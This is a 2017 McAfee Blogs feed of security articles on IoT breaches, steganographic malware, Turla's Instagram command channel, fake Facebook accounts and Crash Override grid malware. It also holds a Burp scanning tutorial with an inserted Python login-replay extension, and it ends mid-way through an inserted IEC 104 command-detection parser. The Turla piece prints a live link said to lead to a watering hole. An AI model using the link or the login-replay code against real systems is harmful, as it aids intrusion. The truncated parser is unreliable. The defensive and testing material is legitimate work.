McAfee Blogs (https://securingtomorrow.mcafee.com) - Securing Tomorrow. Today. Feed generated Wed, 21 Jun 2017 19:00:27 +0000.

An Unmatched Customer Experience
https://securingtomorrow.mcafee.com/business/unmatched-customer-experience/
Wed, 21 Jun 2017 19:00:27 +0000
I’ve been in this industry for over twenty years, and the advancements in cybersecurity over the last few years are unmatched. As an industry, we went from believing in a best-in-breed, siloed approach and now we understand our customers need a connected security architecture that can protect, detect, and correct. While we’ve made impressive advancements, I’ve found that the user experience still needs improvement and some user interfaces are still stuck in the past, hard to work with, and difficult to manage.

McAfee’s new Endpoint Security 10.5, which you hear me talk about often, offers the best and most advanced data and device protection available. It also includes the Endpoint Threat Defense and Response products as a complementary suite, providing businesses with end-to-end security intelligence, management, and protection.

What more could an enterprise security manager want? Simply, a better experience.

Whoever they may be, the consumers of our products aren’t necessarily focused on just having the best technology. They’re interested in better use cases, an ease of productivity and workflows, and intuitive interactions with applications and resources. Yes, they want better outcomes, but they also want to enjoy the journey between purchase and result.

There are two means to delivering superior customer experience: technology delivery and support and project and relationship management. Let’s look at them in order.

Technology Delivery and Support

Business buyers expect technology to simply work out of the box (even if it’s a virtual box). This expectation is a byproduct of the consumerization of the enterprise. Through consumer products, such as smartphones and mobile apps, our business customers have a growing belief that products shouldn’t just work as described, but should exceed expectations.

Security products and services aren’t so simple. It takes skilled technicians to deploy, integrate, and configure security products to an optimal state. McAfee partners are instrumental in taking the complexity out of our products and ensuring customers get the maximum benefit by applying their technical skills. Without this expert guidance and support, customers have a diminished experience and are more likely to change providers – on the vendor and reseller levels.

And this is where the new dimension of experience comes in; what’s needed is market-leading project and relationship management.

Relationship Management

Many resellers know already that they can’t afford the one-time sale, where they deliver a product and leave a customer to their own devices. Success, particularly in business models that rely on recurring revenue, depends on persistent engagement with customers to ensure they have a great experience with the products they buy and, ultimately, the provider of those products. In other words, this is the means for a superior experience with you, the partner.

The new customer engagement dynamic means you must understand the customer’s need and expectations, deliver the product, provide the supporting service, and remain connected to ensure they get the maximum benefit from their purchase. It’s a tall order, given that many partner organizations struggle with resources.

Meeting these new experience expectations requires creativity. I’ve talked with scores of partners that are forming collaborative relationships with peer organizations to share resources. They’ve learned that creating partnerships for professional services is easier and more effective than developing this expertise on their own. One organization provides products. Another organization provides the professional services. And a third organization provides the project and relationship dynamic.

Making it Easy for You

If none of this sounds easy, it’s because it’s not. As Steve Jobs once said, “Simple can be harder than complex: You have to work hard to get your thinking clean to make it simple. But it’s worth it in the end because once you get there, you can move mountains.”

Part of our jobs in this experience-based market is masking the complexity of security technology with our expertise and collaborative resources. As a community, we have all the resources needed to achieve this objective. Whether we do this as individual businesses or through collective efforts, we need to hone our thinking to include customer experience as our product.

Together is power, especially in delivering superior experiences.

Data breaches impact nearly half of IoT organizations
https://securingtomorrow.mcafee.com/business/safeguard-data/data-breaches-impact-nearly-half-of-iot-organizations/
Tue, 20 Jun 2017 20:17:53 +0000

Nearly half of U.S.-based companies using an Internet of Things network have been hit by a recent security breach, according to new survey data released by strategy consulting firm Altman Vilandrie & Company.

The April 2017 survey of 397 IT executives across 19 industries showed that 48 percent of organizations have experienced at least one IoT security breach. It revealed the significant financial exposure of weak IoT security for companies of all sizes.

Nearly half of the businesses with annual revenues above $2 billion estimated the potential cost of one IoT breach at more than $20 million.

“While traditional cyber security has grabbed the nation’s attention, IoT security has been somewhat under the radar, even for some companies that have a lot to lose through a breach,” said Stefan Bewley, director of Altman Vilandrie and author of the study.

“IoT attacks expose companies to the loss of data and services and can render connected devices dangerous to customers, employees and the public at large,” Bewley said. “The potential vulnerabilities for firms of all sizes will continue to grow as more devices become Internet dependent.”

The study showed that preparedness helps. Companies that have not experienced a security incursion have invested 65 percent more on IoT security than those who have been breached. Other key findings: 68 percent of respondents think about IoT security as a distinct category, yet only 43 percent have a standalone budget.


This article was written by Bob Violino from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The #1 Skill All Parents Should Be Homeschooling Kids in This Summer
https://securingtomorrow.mcafee.com/consumer/family-safety/the-one-skill-all-parents-should-be-homeschooling-kids-in-this-summer/
Tue, 20 Jun 2017 12:00:56 +0000

Dear Mr. and Mrs. Smith, your child’s decision to post inappropriate content online is why we’ve decided to rescind our previous invitation to attend Harvard University. 

Can you imagine getting an email or a phone call to that effect? Hopes and dreams dashed because of a careless, crude, or unwise online conversation a very bright kid assumed would be kept private. Every day it becomes more and more clear that hasty, online choices can have permanent, real-world consequences.

~ ~ ~

That very scenario recently happened when Harvard University announced rescinded admission letters of 10 students accused of sharing sexually explicit and sometimes racist images in a private online message group.

Such a sad, albeit familiar, headline peppering our digital periphery today. Only this time, the consequence fell on would-be Harvard students (which obliterates our private, silent theory that perhaps it’s only ignorant, unsupervised, aimless kids who mess up [big time] online).

The task for parents armed with the lesson of this latest story? It may be a chance to maximize the summer hours with your kids and zero in on homeschooling in Social Appropriateness 101. Could the faux pas and slip-ups be closer to your family’s domain than you are comfortable admitting?

So where do we start? Rather than go aimlessly into Google universe, here’s a primer to help you equip your kids to make wise choices online.

Social Appropriateness 101

  1. Grow, value discernment. How do we teach our children to invest the necessary thought into all those hours of mindless clicks? How do we keep from raising kids who are digital lemmings who just go with the flow? We make discernment, and growing it, a defined value in our home. Discernment — the ability to judge well — is a skill that develops over time. Sound digital behavior hinges on a child’s ability to discern between wise and unwise content, and between careful and impulsive behaviors. The online culture gives our discernment a workout every second. Information comes at us quickly and provokes a dozen emotions at once. Remember: If it’s tough for adults to pause and reflect before posting, imagine how tough it is for kids to show restraint and discernment online (don’t forget, kids’ brains do not fully form until they are 24)! Here are ten questions to help kids build judgment and critical thinking skills. A good rule of thumb in posting anything: When in DOUBT — just DON’T.
  2. Discuss empathy often. Empathy is making an attempt to understand another person’s struggle and is a powerful way to combat bullying and discrimination. Understanding and extending empathy force us to humanize those we often seek to stereotype, judge, or malign. As part of your homeschooling efforts, this summer, teaching compassion for others should be at the top of the list. For a deeper dive into empathy go over these points with your kids.
  3. Get back to basics. Kids often bemoan that teachers and parents deluge them with lectures about online safety and smart posting (mine does). Still, smart kids make dumb mistakes every day. So ignore the eye rolling and get back to the basics that help kids understand their digital footprint and the responsibility that comes with owning a digital device of any kind. Pose these questions to your child:
    • Is this something you really want everyone to know that about you?
    • What do you think this photo communicates about you (use adjectives)?
    • Have you considered what the parents of your friends, a teacher or a coach might think of you or your friend if they saw that post?
    • How do you think that person would feel if he or she saw your post about them a few years from now?
  4. Role play. One of the best ways to grow your child’s empathy muscle is to role play. Find teachable moments in which empathy has been overlooked. Has a friend been neglected for a party invitation? Is someone not present being mocked or talked about in a cruel way? Look for opportunities to explain and illustrate empathy. Role playing brings insight and compassion up close for a teen. Ask your teen to play the part of the person under attack or who is different in a situation. Ask your teen questions or make value judgments that will challenge him or her to verbalize what another person might be feeling or thinking. This is an excellent way to challenge stereotypes and prejudices.
  5. Introduce media literacy. Raising kids who are critical thinkers, who can wisely create, and share wise content, is among the top parenting goals of the digital age. Media literacy, as defined by the National Association for Media Literacy, is the ability to access, analyze, evaluate, create, and act using all forms of communication. Media literacy is a skill that allows digital users to become critical thinkers and creators, effective communicators, and active digital citizens. This means we all play a role in making the Internet a safe place to exchange ideas and appropriate content. Cyberwise.org is a great learning hub equipping parents in everything digital.
  6. Read a little more. Lay aside the fiction this summer and up your digital IQ. Read blogs, books, and news on internet safety, kids online, reputation management, new apps, and trends in social networking that could impact your family. A recent study conducted by Common Sense Media revealed that 30 percent of teens who are online believe their parents know “a little” or “nothing” about what social media apps and sites they use. Still, those same teens admitted their parents have the biggest influence on determining what is appropriate and inappropriate online. So prove those lingering doubts wrong and read more about how to boost your tech IQ. Set up a Google Alert to keep up with online trends that affect your family. Google Alerts pull relevant content from the web and deliver it directly to your inbox.
  7. Be the digital example. If you want to get serious about influencing your child’s digital habits and leading in this area, be the example of a balanced, empathy-driven digital life. Limit your time on social networks when at home, unplug consistently, post and comment wisely, and always keep your emotions in check online. Part of being the example includes being able to admit your digital mistakes. Kids need to know you aren’t perfect and learn from how you handled a digital situation such as cyberbullying, a political argument, or even a tech addiction. Be open, honest, and candid in leading your kids in social appropriateness.
  8. Repeat the risks. Kids become desensitized to potential hazards online and even develop a false sense of security and privacy (as seen in the Harvard case). This attitude opens them up to some severe consequences. Observe your child. If she seems overly confident or blows off your safety concerns, it’s time to step up the appropriate-sharing talk.

The quest to teach kids more about social appropriateness includes knowing exactly where to look for reliable, easy-to-understand information. It’s so easy to get overwhelmed, so many parents give up too soon and live in denial about what their kids really do online. Choose your favorite resources, and simply keep up — it matters. Sources to explore include: Family Online Safety Institute (FOSI), Above The Fray, Cyberwise.org, online safety blogger and author Sue Scheff, Common Sense Media and, of course, McAfee Family Safety.


Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @IntelSec_Family. (Disclosures).

Is That Photo Containing a Cyberthreat? What to Know About Steganographic Malware
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/steganographic-malware/
Tue, 20 Jun 2017 04:01:27 +0000

Secret messages are hidden everywhere – within a hit song, a brand logo, a big blockbuster movie. Usually, these messages are fun Easter eggs or nods to fans. In the digital world, this kind of practice is called steganography, and messages are usually concealed in images, audio tracks, video clips, or text files. But, instead of being a fun nod to users, these messages can sometimes contain something malicious, specifically, malware. In fact, digital steganography is often used by malware authors to avoid detection by security systems.

So how does a steganographic cyberattack work? First, cybercriminals use an embedding algorithm to insert secret information into a digital image. Then, the image is transmitted to the target system, and from there the secret information is extracted for use by malware. The modified image is often difficult to detect by the human eye or by security technology – which is exactly why these crooks are using steganography to conduct cyberattacks.

Now, how often are these attacks happening? The first known use of steganography in a cyberattack was in 2011 with the Duqu malware. Steganographic malware has also been used on Instagram and has come included in exploit kits. However, a new variation of the threat is currently on the rise, as our McAfee Labs Threats Report: June 2017 has found that the Stegoloader malware code is currently hiding itself within the following image:

Users downloading free “pirated software” download this image along with the free program. While the user’s PC is completing the installation process, the image is unlocked and begins to download other malicious software onto the PC. For instance, Stegoloader can either download software that steals information from the infected system, or download ransomware that encrypts the PC’s information and holds it hostage until the victim pays.

Moral of the story: you get what you pay for. So, users need to be wary of where they get their software. In these steganographic malware cases, if you pay nothing to download software that would otherwise cost you money, there’s a big chance you may find yourself downloading junk software applications and then paying cybercriminals in other ways. Therefore, to protect yourself from steganographic malware, follow these tips:

-Go straight to the source. If you want software, it’s best to just go directly to legitimate sites and stores to download it. Though this software may be more costly than pirated services, these free programs can put your personal data at risk, and you could end up paying a ransom to get your information back.

-Do your homework. Whenever you want to load software onto your device, make sure you do your homework before you click the download button. Look up the provider and check for any reviews online that mention issues with security. If something sketchy comes up, steer clear of the program entirely.

-Use a comprehensive security solution. Whether you’re downloading software for your PC or phone, ensure all of your devices are protected from cyberattacks by adding in an extra layer of security. To create that additional barrier, utilize a comprehensive security solution, such as McAfee LiveSafe.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

‘McAfee Labs Threats Report’ Explores Malware Evasion Techniques, Digital Steganography, Password-Stealer Fareit
https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-labs-threats-report-explores-malware-evasion-techniques-digital-steganography-password-stealer-fareit/
Tue, 20 Jun 2017 04:01:23 +0000

We got a little carried away in the McAfee Labs Threats Report: June 2017, published today. This quarter’s report has expanded to a rather hefty 83 pages! It contains three highly educational topics, in addition to the usual set of threats statistics:

  • We broadly examine evasion techniques and how malware authors use them to accomplish their goals. We discuss the more than 30-year history of evasion by malware, the underground market for off-the-shelf evasion technology, how several contemporary malware families leverage evasion techniques, and what to expect in the future, including machine-learning and hardware-based evasion.
  • We explore the very interesting topic of steganography in the digital world. Digital steganography hides information in benign-looking objects such as images, audio tracks, video clips, or text files. Of course, attackers use these techniques to move information past security systems. We explain how that happens in this key topic.
  • We deconstruct Fareit, the most famous password-stealing malware. We cover its origins, typical infection vectors, architecture and inner workings, how it has changed over the years, and how it was likely used in the breach of the Democratic National Committee before the 2016 U.S. Presidential election. Coincidentally, DocuSign reported that on May 15, customer email addresses were stolen and then used in a phishing campaign. Victims who clicked on the phishing links were infected with malware, including Fareit. Read our technical analysis of the DocuSign attack.

Accompanying each of these key topics is a Solution Brief that goes into detail about how McAfee products can protect against these threats.

Here are some highlights from our extensive analysis of threats activity in Q1:

  • Malware: New malware samples rebounded in Q1 to 32 million. The total number of malware samples increased 22% in the past four quarters to 670 million samples.
  • Ransomware: New ransomware samples rebounded in Q1 primarily due to Congur ransomware attacks on Android OS devices. The number of total ransomware samples grew 59% in the past four quarters to 9.6 million samples. (We will discuss the WannaCry ransomware in our next quarterly report.)
  • Mobile malware: Reports from Asia doubled in Q1, contributing to a 57% increase in global infection rates. Total mobile malware grew 79% in the past four quarters to 16.7 million samples.
  • Incidents: We counted 301 publicly disclosed security incidents in Q1, an increase of 53% over Q4. The health, public, and education sectors comprised more than 50% of the total. 78% of all publicly disclosed security incidents in Q1 took place in the Americas.

Read the McAfee Labs Threats Report: June 2017.

Automation seen as relief for payment fraud worries
https://securingtomorrow.mcafee.com/business/optimize-operations/automation-seen-as-relief-for-payment-fraud-worries/
Mon, 19 Jun 2017 22:42:45 +0000

Financial and payment professionals don’t anticipate any respite from cyber fraud and attacks in the near future, according to a recent survey conducted by TD Bank.

An overwhelming 91 percent of the 392 finance professionals surveyed by the bank at the recent 2017 NACHA Payments conference said they expect payments fraud will become a bigger threat in the next two to three years.

The concerns are not without merit, the report said, with 64 percent of the respondents saying either their organization or one of its clients was involved in a cyber security event in the past year.

The most commonly cited incidents were business email compromise (20 percent); account takeover (19 percent); and data breach (15 percent).

“Companies need to be mindful that everyday tools from email to the Internet can pose risk to payment operations, and the criminal toolbox is expanding,” said Rick Burke, head of corporate products and services at TD Bank. “Corporate treasurers need to create layers of control for accounts and payments processing, both within their organization and in conjunction with their banking partners.”

The finance professionals surveyed said automating payments processing could offer greater defense against attacks, Burke noted. When thinking about the advantages of automating payments, 21 percent cited fraud control and security as the top benefit.


This article was written by Bob Violino from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

How a Hacking Group Used Britney Spears’ Instagram to Operate a Command and Control Server
https://securingtomorrow.mcafee.com/business/hacking-group-used-britney-spears-instagram-operate-command-control-server/
Mon, 19 Jun 2017 16:01:28 +0000

A nasty piece of malware is currently being tested by a Russian hacking group named Turla, and its trial round has been conducted in an unexpected area of the internet — the comments section of Britney Spears’ Instagram. As a matter of fact, they’re using her Instagram as a way to contact the malware’s command and control (C&C) server.

So how does Turla make this happen, exactly? Leveraging a recently discovered backdoor found in a fake Firefox extension, the cybercriminals instruct the malware to scroll through the comments on Spears’ photos and search for one that has a specific hash value. When the malware finds the comment it was told to look for, it converts it into this Bitly link: http://bit.ly/2kdhuHX. The shortened link resolves to a site that’s known to be a Turla watering hole.

This way, should their infrastructure be discovered, the cybercriminals can change the C&C address without having to change the malware. If the attackers want to set up a new meetup location, all they have to do is delete the first comment and post a new one that yields the same hash value.

This infected comment on Spears’ post doesn’t look exactly normal, but most people probably would think it’s just spam — unless they clicked it. If someone does in fact click on the link, they’ll be directed to the hacker group’s forum, which is where they actually infect innocent users. For this Trojan in particular, visitors who click will get taken to a site and asked to install the extension with the benign name “HTML5 Encoder.”

The good news is — this is, after all, just a test. Plus, Firefox is said to be already working on a fix so that the extension being used won’t work anymore.

For more information on this attack and others like it, follow @McAfee and @McAfee_Business.

Setting Up Automated Scanning of Apps Using Custom Authentication, Part 2
https://securingtomorrow.mcafee.com/technical-how-to/setting-automated-scanning-apps-using-custom-authentication-part-2/
Mon, 19 Jun 2017 12:08:03 +0000

Automated security scanning has always been a challenge for applications that implement custom authentication mechanisms. Have you ever come across a scenario in which automated tools have failed to scan an application because of an authentication failure? Most automated scanners replay login requests to authenticate when a session expires during a scan.

We encountered such a scenario on a recent engagement and have written two posts to explain the issues involved in solving this challenge. In the first part, we discussed the problems automated scanning tools face when login credentials are randomized and login requests cannot be replayed. In this part, we go through the steps required to address this issue using the automation capabilities of the intercepting proxy tool Burp.

Burp extension

In the target application, client-side JavaScript generates a hash-based message authentication code (HMAC) from the user-supplied password and a random key that the server issues before authentication. We will write a sample Burp extension that performs the same operation and posts the login request.

The extension fetches the random value from the HTML hidden field and calculates the HMAC from the password and that value. The credentials are hardcoded in the extension code. Once the HMAC is calculated, the extension sends the login request to a URL such as http://localhost:8080/test01/Signin. The code that creates the HMAC of the password and logs into the application lives inside the PerformAction function.

The following code is saved as test.py:
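The post's own test.py listing is not reproduced above. As an added example, and not the authors' code, the following shows how such a session-handling extension can be structured for Burp's Jython runtime. It assumes details the post does not state: that the login page lives at /test01/Login.jsp, that the random key is carried in a hidden input named "rnd", that the form fields are username, password and rnd, and that the HMAC is HMAC-SHA256 with the random key as key and the password as message, base64-encoded (the construction shown in the reference linked at the end of the post). The sample login page is constructed for the offline checks; the Burp interfaces are stubbed when the module is imported outside Burp.

```python
# Added example (not the post's own test.py): the shape of a Burp session-handling
# extension that replays a login whose password is HMAC'd with a server-issued random key.
# Assumptions about the demo app (not stated in the post): the login page is
# /test01/Login.jsp, the random key sits in a hidden input named "rnd", the form fields are
# "username"/"password"/"rnd", and the HMAC is base64(HMAC-SHA256(key=random key, msg=password)).
# Written to run under Burp's Jython 2.7 as well as CPython 3 (no f-strings).
import base64
import hashlib
import hmac
import re

try:
    from urllib.parse import quote as urlquote      # CPython 3
except ImportError:                                 # Jython 2.7 inside Burp
    from urllib import quote as urlquote

try:
    from burp import IBurpExtender, ISessionHandlingAction
except ImportError:
    # Outside Burp the Java interfaces do not exist; stub them so that the
    # pure-Python helpers below can still be imported and tested.
    class IBurpExtender(object):
        pass

    class ISessionHandlingAction(object):
        pass

LOGIN_PAGE = "/test01/Login.jsp"     # assumed: page that carries the hidden random key
LOGIN_ACTION = "/test01/Signin"      # login endpoint named in the post
KEY_FIELD = "rnd"                    # assumed hidden-field name
USERNAME = "tester"                  # test-account credentials, hardcoded as in the post
PASSWORD = "Passw0rd!"

# Constructed stand-in for the login page, used by the offline checks.
SAMPLE_LOGIN_PAGE = (
    '<form method="POST" action="/test01/Signin">'
    '<input type="hidden" name="rnd" value="5f3a9c1e" />'
    '<input type="text" name="username" /><input type="password" name="password" />'
    '</form>'
)


def extract_hidden_field(html, name):
    """Return the value attribute of the <input> called `name`, or None if absent."""
    pattern = re.compile(
        r'<input[^>]*\bname=["\']%s["\'][^>]*\bvalue=["\']([^"\']*)["\']' % re.escape(name),
        re.IGNORECASE)
    match = pattern.search(html)
    return match.group(1) if match else None


def hmac_password(password, random_key):
    """Same computation as the app's JavaScript: base64(HMAC-SHA256(key=random_key, msg=password))."""
    mac = hmac.new(random_key.encode("utf-8"), password.encode("utf-8"), hashlib.sha256).digest()
    return base64.b64encode(mac).decode("ascii")


def build_login_body(username, password, random_key):
    """Form-encoded body posted in place of the browser (safe="" also encodes +, / and =)."""
    return "username=%s&password=%s&%s=%s" % (
        urlquote(username, safe=""), urlquote(hmac_password(password, random_key), safe=""),
        KEY_FIELD, urlquote(random_key, safe=""))


class BurpExtender(IBurpExtender, ISessionHandlingAction):
    """Burp glue; only exercised inside Burp, where it registers the action the rule invokes."""

    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("Login to demo App")
        callbacks.registerSessionHandlingAction(self)

    def getActionName(self):
        return "Login to demo App"   # label shown in the session-handling action editor

    def performAction(self, currentRequest, macroItems):
        service = currentRequest.getHttpService()
        helpers = self._helpers
        host = service.getHost()
        # 1. Fetch the login page to obtain a fresh random key.
        page = self._callbacks.makeHttpRequest(service, helpers.buildHttpMessage(
            ["GET %s HTTP/1.1" % LOGIN_PAGE, "Host: %s" % host], None))
        response = page.getResponse()
        if response is None:
            return
        body_offset = helpers.analyzeResponse(response).getBodyOffset()
        random_key = extract_hidden_field(helpers.bytesToString(response[body_offset:]), KEY_FIELD)
        if random_key is None:
            return                      # leave the request alone; the rule retries on the next check
        # 2. Replay the login with the HMAC'd password, exactly as the browser would.
        body = build_login_body(USERNAME, PASSWORD, random_key)
        login = self._callbacks.makeHttpRequest(service, helpers.buildHttpMessage(
            ["POST %s HTTP/1.1" % LOGIN_ACTION, "Host: %s" % host,
             "Content-Type: application/x-www-form-urlencoded"], helpers.stringToBytes(body)))
        # 3. Hand the new session cookie to Burp's cookie jar so the
        #    "Use cookies from Burp's cookie jar" rule applies it to subsequent requests.
        if login.getResponse() is not None:
            for cookie in helpers.analyzeResponse(login.getResponse()).getCookies():
                self._callbacks.updateCookieJar(service, cookie)
```

Loaded through Extender with the Jython standalone jar configured, the class registers "Login to demo App" as a session-handling action; the three helper functions are plain Python so the HMAC and form-building logic can be checked outside Burp before the extension is wired into a rule.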

Adding the extension

Navigate to Extender->Extensions->Burp Extensions and click Add. Provide the location of the test.py file created above. Make sure you have set the path to the jython-standalone .jar file under the Options tab (Extender->Options->Python Environment).

Figure 1: Adding extension code to the Extender tool.

If the extension loads successfully, it appears as “Login to demo App” in the drop-down menu under the label “After running the macro, invoke a Burp extension action handler” in the session-handling action editor. Let’s verify:

Navigate to Project options -> Sessions -> Session Handling Rules -> Add/Edit (Screen 1) -> Session handling rule editor -> Rule Actions -> Add -> Check session is valid (Screen 2) -> Session handling action editor (Screen 3) and scroll to the bottom.

Figure 2: The added Burp extension is available under “After running the macro, invoke a Burp extension action handler.”

Defining the session-handling rule

To configure Burp to validate the session and invoke the extension code when the session has been terminated, open the session-handling action editor. (See Screen 2 below.)

During the automated scan, it is important to check constantly whether the session is still valid. Any post-authentication request can be used to track session validity, as long as it returns clearly different responses for valid and invalid sessions.

Go to the label “Make request to validate session” and select “Run macro.” Add the post-authentication request (http://localhost:8080/test01/Start.jsp) as the macro and configure Burp to issue it after every fifth request. If Start.jsp answers with a 302 redirect, the session is invalid. Screen 2 below shows this configuration. (Note that these details are specific to the application being tested.)

Figure 3: Configuring session-handling rules.

Invoking the extension based on session validity

In the sample application, the 302 redirect response for the request http://localhost:8080/test01/Start.jsp indicates the session has expired. At this time Burp needs to invoke our extension to perform the login operation so that automated scanning can resume.

Select “If session is invalid, perform the action below” under the label “Define behavior dependent on session validity” and specify the added extension “Login to demo App” for execution.

Figure 4: Further configuring of session-handling rules.

When the session has expired, the extension triggers authentication and obtains a valid session ID. We can configure the rule to update Burp’s cookie jar with the new session ID, and that updated cookie jar can be applied to any Burp tool by defining the “Use cookies from Burp’s cookie jar” rule in the session-handling rules section. Refer to our post “Efficient Application Testing With Burp’s Cookie Jar” to learn more. This step is what tells Burp tools such as Intruder and Repeater that a new session is available.

In the following section, we will verify whether our configuration works as expected.

Select any request from the proxy history and send it to Intruder. Right-click in the request editor and scan the request by selecting “Actively scan defined insertion points.”

Figure 5: Sending the request to the scanner tool from Intruder.

Analyze the logs using Logger++

Recall that after every fifth request, a call is made to start.jsp. The successful response (200 OK) indicates the session is valid; Burp performs no further actions.

Figure 6: The request log using Logger++. Session validation is performed after every fifth request. (See requests 445, 451,457.)

After a certain time, start.jsp returns a 302 redirect (see below), which indicates that the session is invalid. Because we have a configured action for session invalidity, in the subsequent request Burp sends the login request to http://localhost:8080/test01/Signin.

Figure 7: The request log using Logger++. In this screenshot, we can see that when the session becomes invalid (see request 512), Burp automatically triggers the extension, which sends a login request (see request 515) to create a new session.

Conclusion

The technique described in this post can be used with any proxy-aware automated scanner, such as sqlmap, to perform an assessment. The code snippet provided can be used as a reference and customized to suit application requirements.

Reference

https://www.jokecamp.com/blog/examples-of-creating-base64-hashes-using-hmac-sha256-in-different-languages/#python

How To Spot A Fake Facebook Account
https://securingtomorrow.mcafee.com/consumer/family-safety/spot-fake-facebook-account/
Mon, 19 Jun 2017 06:59:44 +0000

The post How To Spot A Fake Facebook Account appeared first on McAfee Blogs.

How do you manage your Facebook friends? Do you keep your list really tight and only include ‘active’ pals? Or do you accept everyone you’ve ever laid eyes on? I’m probably somewhere in between. But… if I have never had a personal conversation with them and ‘eyeballed’ them in the flesh, then they don’t get a guernsey!

Over the last few weeks I have received a steady increase of friend requests from people who I just don’t know. My gut tells me that these are fake accounts. Why? I’ve never eyeballed them, they have few or no friends, and have very little personal information available to share on their profiles. I mentioned this to my 20-year-old son who informed me he gets about 10 a week!

And while it can be annoying being harassed by randoms – as my kids would say – the issue is far bigger than that. Fake Facebook accounts are usually designed by clever cyber crims who are trying to extract personal information from unsuspecting naive types – often kids. And why do they want our personal information? It allows them to put together a profile that they can use to apply for loans, mobile phone plans, etc – but we’ll get to that later.

How Big Is The Fake Account Issue?

In its latest reporting, Facebook stated that it has a whopping 1.86 billion monthly active users. In 2012, Facebook’s reporting stated that 8.7% of its accounts were either fake or duplicates. Even assuming the percentage has stayed about the same, that means there are now a monstrous 161 million fake or duplicate Facebook accounts! So it’s highly likely that you (and your kids) will have been affected.

How Can We Tell If A Facebook Account Is Fake?

Experts believe that fake accounts fall into two categories, being operated either by a bot (aka web robot) or by an ill-intentioned human. But irrespective of type, there are several warning signs that an account is fake. If the account in question displays three or more of these signs, then avoid it at all costs:

Beauty

Bots exploit beauty and often sport a pic of a gorgeously attractive girl or handsome guy on their pages. Why? We are only human – an enticing photo dramatically increases the chance of having a friend request accepted.

Not Many Pics

Bots tend not to post lots of photos. Their aim is to use minimum effort to create the illusion that a real person is behind the account so they don’t bother too much with fleshing out a personal life.

Weird Bio Information

If the biography information on the account seems fanciful or just plain unrealistic, then it’s likely not to be a legitimate account.

The Account Doesn’t Message

Bots can easily accept friend requests but generally can’t hold a conversation. So, if you are unsure, this is a great little test: just send a message and see what you get back!

Blank Wall

Blank walls are a dead giveaway for a fake account. If your possible ‘new friend’ has either no activity or just a few likes – then be suspicious!

Lots Of Likes

Some bot-controlled accounts are set up to like a certain number of pages a day. Over time this adds up, so be wary!

Why Are Fake Facebook Accounts Created?

As mentioned earlier, cyber hackers create fake Facebook accounts with the aim of trying to friend people and get access to their personal information. Identity theft is their motivation. They can profit from this private information by personally taking out loans or credit cards in someone else’s name. Or – and this is more likely – they on-sell the information so others can do so.

But fake Facebook accounts can also be created just to make money. Buying and selling Facebook fans is a multi-million dollar business, as both companies and individuals pay big money to get fans and likes to their page. And with the software to create these fake Facebook pages costing no more than $200, you can see how easily profits can be made.

What To Do If You Are Sure A Facebook Account Is Fake

  1. Most importantly, do NOT follow or accept a friend request from the account.
  2. Report the account to Facebook by clicking the report option. When Facebook receives around 10-20 reports about a specific account they will investigate, so it’s worth doing.

Lastly, do NOT insist your kids delete their Facebook account because of the threat of fake accounts. Teaching our kids how to live online is probably one of our biggest jobs as parents of digital natives. Thinking critically, understanding risks and learning how to navigate obstacles are skills that will hold them in good stead for their entire lives. Whoever thought discussing a fake Facebook account could have so many benefits!

Take care.

Alex xx

Crash Override Malware Can Automate Mass Power Outages
https://securingtomorrow.mcafee.com/business/crash-override-malware-can-automate-mass-power-outages/
Fri, 16 Jun 2017 22:00:05 +0000

The post Crash Override Malware Can Automate Mass Power Outages appeared first on McAfee Blogs.

Some cyberattacks take a device offline, some take companies offline, and some take entire power grids down. The potential for the last now exists: a new piece of malicious software has emerged that can cause power outages by ordering industrial computers to shut down electricity transmission. It is named Crash Override, or Industroyer, and it is believed to be the malware behind the Ukrainian power outage in December 2016.

That December attack, which took out an electric transmission station north of Kiev and blacked out part of the Ukrainian capital for an hour, may have been only an initial test. The attackers now appear to be testing the most evolved variant of the grid-infecting malware seen yet, a version said to be capable of causing outages of up to a few days in portions of a nation’s grid.

How exactly does it work? Though the attack vector has not been confirmed, the infection is reported to start with phishing emails. The malware attacks Microsoft Windows systems only and then tries to communicate with ICS devices using four different payloads, one for each of four ICS protocols:

  • IEC 60870-5-101 (aka IEC 101)
  • IEC 60870-5-104 (aka IEC 104)
  • IEC 61850
  • OLE for Process Control Data Access (OPC DA)

Once inside, the malware installs a second backdoor, which is a trojanized version of Windows Notepad. The purpose of this second backdoor is to act as backup in the chance that the main backdoor is discovered, as well as to survive reboots.

Additionally, the threat actors used a custom DDoS tool that exploited a flaw, classified under CVE-2015-5374, to render Siemens SIPROTEC devices unresponsive. They also used a custom port scanner to map the target’s network and a custom data wiper to make the infected Windows devices crash and to complicate incident response for IT security analysts.

What next? The good news: known malicious samples are detected in the latest DATs by McAfee ENS and Web Gateway, and Microsoft has patches available. Keep Windows systems and ICS devices up to date. The malware can also be detected if utility companies monitor their networks for abnormal traffic, including signs that the malware is searching for substation equipment or sending commands to switches.
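To make the last point concrete, here is an added example that is not from the post or from any vendor product: a minimal parser for IEC 60870-5-104 (one of the four protocols listed above) with a detection rule that flags control commands, the class of traffic an operator should never see originating from an ordinary Windows host. The frame layout and type identifiers follow the standard; the byte stream below is constructed by hand, not captured from a real substation, and the information-object addresses in it are arbitrary.

```python
# Added example (not from the post): decode IEC 60870-5-104 APDUs from a TCP payload and
# flag ASDUs that carry control commands with cause of transmission "activation".
# The sample stream is constructed, not captured.
import struct

# ASDU type identifiers that carry process-control commands (IEC 60870-5-101 / -104).
CONTROL_TYPE_IDS = {
    45: "C_SC_NA_1 single command",          46: "C_DC_NA_1 double command",
    47: "C_RC_NA_1 regulating step command", 48: "C_SE_NA_1 set point, normalised",
    49: "C_SE_NB_1 set point, scaled",       50: "C_SE_NC_1 set point, float",
    51: "C_BO_NA_1 bitstring command",       58: "C_SC_TA_1 single command + time",
    59: "C_DC_TA_1 double command + time",   60: "C_RC_TA_1 regulating step + time",
    61: "C_SE_TA_1 set point + time",        62: "C_SE_TB_1 set point + time",
    63: "C_SE_TC_1 set point + time",        64: "C_BO_TA_1 bitstring command + time",
}
# Information-element size (bytes following the 3-byte IOA) for the types decoded here.
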